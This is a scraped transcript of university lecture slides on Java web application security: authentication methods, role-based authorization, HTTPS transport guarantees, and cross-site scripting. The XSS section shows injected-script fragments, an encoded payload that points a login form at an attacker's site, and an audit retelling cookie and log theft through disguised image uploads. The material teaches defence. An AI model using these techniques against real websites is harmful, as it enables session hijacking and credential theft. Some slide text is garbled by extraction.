COMP 321 Week 12. Overview Web Application Security  Authentication  Authorization  Confidentiality Cross-Site Scripting Lab 12-1 Introduction.

Slides:



Advertisements
Similar presentations
Cross-Site Scripting Issues and Defenses Ed Skoudis Predictive Systems © 2002, Predictive Systems.
Advertisements

Nick Feamster CS 6262 Spring 2009
Web Security Never, ever, trust user inputs Supankar.
WEB DESIGN TABLES, PAGE LAYOUT AND FORMS. Page Layout Page Layout is an important part of web design Why do you think your page layout is important?
HI-TEC 2011 SQL Injection. Client’s Browser HTTP or HTTPS Web Server Apache or IIS HTML Forms CGI Scripts Database SQL Server or Oracle or MySQL ODBC.
Hands-on SQL Injection Attack and Defense HI-TEC July 21, 2013.
WEB BROWSER SECURITY By Robert Sellers Brian Bauer.
©2009 Justin C. Klein Keane PHP Code Auditing Session 5 XSS & XSRF Justin C. Klein Keane
Attacking Authentication and Authorization CSE 591 – Security and Vulnerability Analysis Spring 2015 Adam Doupé Arizona State University
ATTACKING AUTHENTICATION The Web Application Hacker’s Handbook, Ch. 6 Presenter: Jie Huang 10/31/2012.
Cross Site Scripting a.k.a. XSS Szymon Siewior. Disclaimer Everything that will be shown, was created for strictly educational purposes. You may reuse.
It’s always better live. MSDN Events Security Best Practices Part 2 of 2 Reducing Vulnerabilities using Visual Studio 2008.
Chapter 9 Web Applications. Web Applications are public and available to the entire world. Easy access to the application means also easy access for malicious.
Chapter 4 Application Security Knowledge and Test Prep
Web Application Security Representation and Management of Data on the Web.
Introduction to the OWASP Top 10. Cross Site Scripting (XSS)  Comes in several flavors:  Stored  Reflective  DOM-Based.
Lecture 16 Page 1 CS 236 Online Cross-Site Scripting XSS Many sites allow users to upload information –Blogs, photo sharing, Facebook, etc. –Which gets.
Lab 3 Cookie Stealing using XSS Kara James, Chelsea Collins, Trevor Norwood, David Johnson.
Designing Security In Web Applications Andrew Tomkowiak 10/8/2013 UW-Platteville Software Engineering Department
 A cookie is a piece of text that a Web server can store on a user's hard disk.  Cookie data is simply name-value pairs stored on your hard disk by.
Introduction to InfoSec – Recitation 10 Nir Krakowski (nirkrako at post.tau.ac.il) Itamar Gilad (itamargi at post.tau.ac.il)
A detailed guide on how to set-up your printing storefront. Please Note: Storefronts are compatible with all browsers, however for optimal use of the admin.
PHP Security.
Reading Data in Web Pages tMyn1 Reading Data in Web Pages A very common application of PHP is to have an HTML form gather information from a website's.
Session 11: Security with ASP.NET
Cosc 4765 Server side Web security. Web security issues From Cenzic Vulnerability report
Prevent Cross-Site Scripting (XSS) attack
CSCI 6962: Server-side Design and Programming Secure Web Programming.
Lecture 14 – Web Security SFDV3011 – Advanced Web Development 1.
Chapter 9 Web Applications. Web Applications are public and available to the entire world. Easy access to the application means also easy access for malicious.
November 13, 2008 Ohio Information Security Forum Attack Surface of Web Applications James Walden Northern Kentucky University
COMP 321 Week 7. Overview HTML and HTTP Basics Dynamic Web Content ServletsMVC Tomcat in Eclipse Demonstration Lab 7-1 Introduction.
3-Protecting Systems Dr. John P. Abraham Professor UTPA.
Lecture # 6 Forms, Widgets and Event Handling. Today Questions: From notes/reading/life? Share Personal Web Page (if not too personal) 1.Introduce: How.
COMP3121 E-Commerce Technologies Richard Henson University of Worcester November 2011.
SE-2840 Dr. Mark L. Hornick1 Web Application Security.
C HAPTER 12 W EB APP SECURITY. T HE BAD GUYS ARE EVERYWHERE As a web application developer you need to protect your web site There are three main kind.
JavaScript – Quiz #9 Lecture Code:
Feedback #2 (under assignments) Lecture Code:
Cross-Site Attacks James Walden Northern Kentucky University.
Web Application Security ECE ECE Internetwork Security What is a Web Application? An application generally comprised of a collection of scripts.
Security Scanners Mark Shtern. Popular attack targets Web – Web platform – Web application Windows OS Mac OS Linux OS Smartphone.
Top Five Web Application Vulnerabilities Vebjørn Moen Selmersenteret/NoWires.org Norsk Kryptoseminar Trondheim
School of Computing and Information Systems CS 371 Web Application Programming Security Avoiding and Preventing Attacks.
SE-2840 Dr. Mark L. Hornick1 Web Application Security.
October 3, 2008IMI Security Symposium Application Security through a Hacker’s Eyes James Walden Northern Kentucky University
SQL INJECTIONS Presented By: Eloy Viteri. What is SQL Injection An SQL injection attack is executed when a web page allows users to enter text into a.
Building Secure Web Applications With ASP.Net MVC.
Java server pages. A JSP file basically contains HTML, but with embedded JSP tags with snippets of Java code inside them. A JSP file basically contains.
Cookies and Sessions IDIA 618 Fall 2014 Bridget M. Blodgett.
UMBC’s WebAuth Robert Banz – UMBC
Web Design: Basic to Advanced Techniques Fall 2010 Mondays 7-9pm 200 Sutardja-Dai Hall Introduction to PHP.
Lecture 16 Page 1 CS 236 Online Web Security CS 236 On-Line MS Program Networks and Systems Security Peter Reiher.
Chapter 16 The World Wide Web. FIGURE 16.0.F01: A very, very simple Web page. Courtesy of Dr. Richard Smith.
Web Security Lesson Summary ●Overview of Web and security vulnerabilities ●Cross Site Scripting ●Cross Site Request Forgery ●SQL Injection.
PHP Form Processing * referenced from
Securing Web Applications Lesson 4B / Slide 1 of 34 J2EE Web Components Pre-assessment Questions 1. Identify the correct return type returned by the doStartTag()
Session 11: Cookies, Sessions ans Security iNET Academy Open Source Web Development.
By Collin Donaldson. Hacking is only legal under the following circumstances: 1.You hack (penetration test) a device/network you own. 2.You gain explicit,
SlideSet #20: Input Validation and Cross-site Scripting Attacks (XSS) SY306 Web and Databases for Cyber Operations.
Building Secure ColdFusion Applications
CSCE 548 Student Presentation Ryan Labrador
Web Application Vulnerabilities, Detection Mechanisms, and Defenses
World Wide Web policy.
API Security Auditing Be Aware,Be Safe
CS 371 Web Application Programming
What is REST API ? A REST (Representational State Transfer) Server simply provides access to resources and the REST client accesses and presents the.
Cross-Site Forgery
Lecture 27 Security I April 4, 2018 Open news web sites.
Cross-Site Scripting Issues and Defenses Ed Skoudis Predictive Systems
Presentation transcript:

COMP 321 Week 12

Overview Web Application Security  Authentication  Authorization  Confidentiality Cross-Site Scripting Lab 12-1 Introduction

Types of “Bad Guys” Impersonators: pretend to be someone with access Upgraders: have valid accounts, but increase their access level Eavesdroppers: listen in on web traffic

Security Answer Authentication: foils impersonators Authorization: foils upgraders Confidentiality and Data Integrity: foils eavesdroppers

HTTP Authentication 1. Client requests protected resource 2. Container returns Unauthorized 3. Browser asks the user for username and password 4. Browser requests resource again with credentials 5. Container verifies credentials 6. Container returns resource

Authorization - Defining Roles <tomcat-users> </tomcat-users> <security-role><role-name>Admin</role-name></security-role><security-role><role-name>Member</role-name></security-role><security-role><role-name>Guest</role-name></security-role><login-config> BASIC BASIC </login-config>

Authorization - Defining Constraints UpdateRecipes UpdateRecipes /Beer/AddRecipe/* /Beer/AddRecipe/* /Beer/ReviewRecipe/* /Beer/ReviewRecipe/* GET GET POST POST Admin Admin Member Member </web-app>

Sharpen Your Pencil Consider the code above. What security step must have happened before this snippet runs? What security step is implied by this snippet? What part, if any, does the DD play in this snippet? How do you think this code works? What if the role of Manager doesn't exist in your container? // In servlet if (request.isUserInRole("Manager")) { // Do something } else { // Do something else }

Sharpen Your Pencil Consider the code above. What security step must have happened before this snippet runs? Authentication What security step is implied by this snippet? Authorization What part, if any, does the DD play in this snippet? It can be used to link the role name Manager to a role defined in the container (as below). How do you think this code works? What if the role of Manager doesn't exist in your container? Manager Admin...

Sharpen Your Pencil Based on the constraints shown below, decide who can access the protected resources: Guest Nobody? Guest? Member? Admin? Everyone?

Sharpen Your Pencil Guest Nobody? Guest?Yes Member? Admin? Everyone?

Sharpen Your Pencil Nobody? Guest? Member? Admin? Everyone?

Sharpen Your Pencil Nobody?Yes Guest? Member? Admin? Everyone?

Sharpen Your Pencil Admin Guest Nobody? Guest? Member? Admin? Everyone?

Sharpen Your Pencil Admin Guest Nobody? Guest?Yes Member? Admin?Yes Everyone?

Sharpen Your Pencil Guest * Nobody? Guest? Member? Admin? Everyone?

Sharpen Your Pencil Guest * Nobody? Guest? Member? Admin? Everyone? Yes

Sharpen Your Pencil Member Nobody? Guest? Member? Admin? Everyone?

Sharpen Your Pencil Member Nobody? Guest? Member? Admin? Everyone? Yes

Sharpen Your Pencil Member Nobody? Guest? Member? Admin? Everyone?

Sharpen Your Pencil Member Nobody?Yes Guest? Member? Admin? Everyone?

Authentication BASIC – Pops up dialog, sends login information encoded in base64 format DIGEST – Sends information in a more secure way, not part of J2EE CLIENT-CERT – Sends login information encrypted with public key, but requires client to have the certificate installed FORM – Allows custom login form to be created in HTML, sends login information in the clear

Authentication BASIC FORM /loginPage.html /loginError.html

Authentication You need to log in Sorry, wrong password.

Confidentiality and Data Integrity Recipes /Beer/UpdateRecipes/* POST Member CONFIDENTIAL

Confidentiality and Data Integrity 1. Client requests constrained resource with transport guarantee (/BuyStuff.jsp) 2. Container sends a 301 Redirect to the client for 3. Browser makes same request over secure connection 4. Container sees resource is constrained, so responds with 401, causing user to log in 5. Browser makes same request for a third time with credentials included, and finally receives page

Cross-Site Scripting A way of putting JavaScript into a vulnerable site that will be executed by other users' browsers One of the biggest vulnerabilities on the web right now, along with SQL injection

Cross-Site Scripting

Image: Alignment: center left Width:

Attacker Running their own JavaScript! alert('test') alert('test') ' width = ''>

Opportunities for “Bad Guys” Change page contents Install malware, and make your site look like the bad guy Steal cookies, and hijack someone else's session

Strategies for Prevention Sanitize the inputs from the user, and make sure they don't contain script Fix the image and width fields in the code that handles form submission. Are we safe now?

Cross-Site Scripting Image: Alignment: Width:

XSS Audit David Zimmer performed an XSS audit of a forum site, and posted his thought process here: World_XSS_3.html World_XSS_3.html

XSS Audit First vulnerability: User name not checked for script tags Added code to his username: This is displayed on every page where the user has posted Evil.js contained a document.writeln Used server logs to see how many people were affected

XSS Audit Second vulnerability: Article name not checked for script tags, but limited to 45 characters This is 55 characters: Third vulnerability: User pictures were not validated at upload, simply saved to disk Upload "image" file, server calls it /images/ jpg Change article title Now users can be attacked by viewing the article list Image file is really a script that sends log data, and then redirects to a real image

XSS Audit Fourth vulnerability: Login handling When a user tries to go to a page that requires an account, the site redirects to login page with referrer as the page the user tried to visit If the user can be convinced to click a link with a script in the referrer, then they will be asked to log in and the script will then be executed

XSS Audit To make the link less suspicious, we can encode the script Then we can make the login form submit to our own site t%20s%72c%3Db%6Cah%3E%3C%2Fsc%72%69p%74%3E document.forms(0).action = "

XSS Prevention Don’t allow script tags  Do this with a whitelist, there are too many possible ways to encode tags otherwise Validate any content that users can upload to your site - text, images, etc. Remember that anything running on the client is NOT trusted

Lab 12-1 Introduction Design solution for the final Lab (13-1) Define Interface for your Actions Design Data Model that will hold the info about: –what actions should be used for which URLs –what JSPs should be used for each return code

Progress Check Due this week Due next week Continue working on Lab 10-1 “JSP User Interfaces”

Feedback: Privacy Policy Feedback
Do Not Sell My Personal Information
About project: SlidePlayer Terms of Service

© 2024 SlidePlayer.com Inc. All rights reserved.